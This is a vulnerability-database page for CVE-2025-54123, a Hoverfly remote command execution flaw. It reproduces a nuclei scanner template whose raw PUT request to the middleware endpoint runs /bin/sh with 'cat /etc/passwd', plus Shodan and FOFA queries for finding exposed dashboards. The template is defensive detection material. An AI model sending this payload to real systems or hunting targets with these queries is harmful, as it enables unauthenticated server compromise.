Lucene search
K

Hoverfly <= 1.11.3 - Remote Code Execution

🗓️ 04 Feb 2026 07:00:26Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 26 Views

Hoverfly versions 1.11.3 and earlier suffer remote code execution through the middleware API command injection.

Related
Refs
Code
id: CVE-2025-54123

info:
  name: Hoverfly <= 1.11.3 - Remote Code Execution
  author: nukunga[seonghyeonJeon]
  severity: critical
  description: |
    Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
  impact: |
    Unauthenticated attackers can inject arbitrary operating system commands through the middleware API endpoint, achieving complete server compromise.
  remediation: |
    Upgrade Hoverfly to a version later than 1.11.3 that properly validates the binary and script parameters in the middleware endpoint.
  reference:
    - https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
    - https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  metadata:
    verified: true
    max-requests: 1
    shodan-query:
      - http.favicon.hash:1357234275
      - title:"Hoverfly Dashboard"
    fofa-query:
      - icon_hash="1357234275"
      - title="Hoverfly Dashboard"
  tags: cve,cve2025,hoverfly,rce,intrusive,vuln,vkev

http:
  - raw:
      - |
        PUT /api/v2/hoverfly/middleware HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "binary": "/bin/sh",
          "script": "cat /etc/passwd"
        }

    matchers:
      - type: dsl
        dsl:
          - "status_code == 422"
          - "regex('root:x:0:0', body)"
          - "contains_all(body, 'STDOUT:','hoverfly')"
        condition: and
# digest: 4a0a004730450220624ddaba1257a5c043c7b4f93e238e9f906dd3a3cc32bcdbc563dfcc244b8958022100a9a72f8bf5e09f2760ba6118a1ceb262c5b73d4d48066bce02caa8da46495d16:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
9High risk
Vulners AI Score9
CVSS 3.19.8
EPSS0.10543
SSVC
26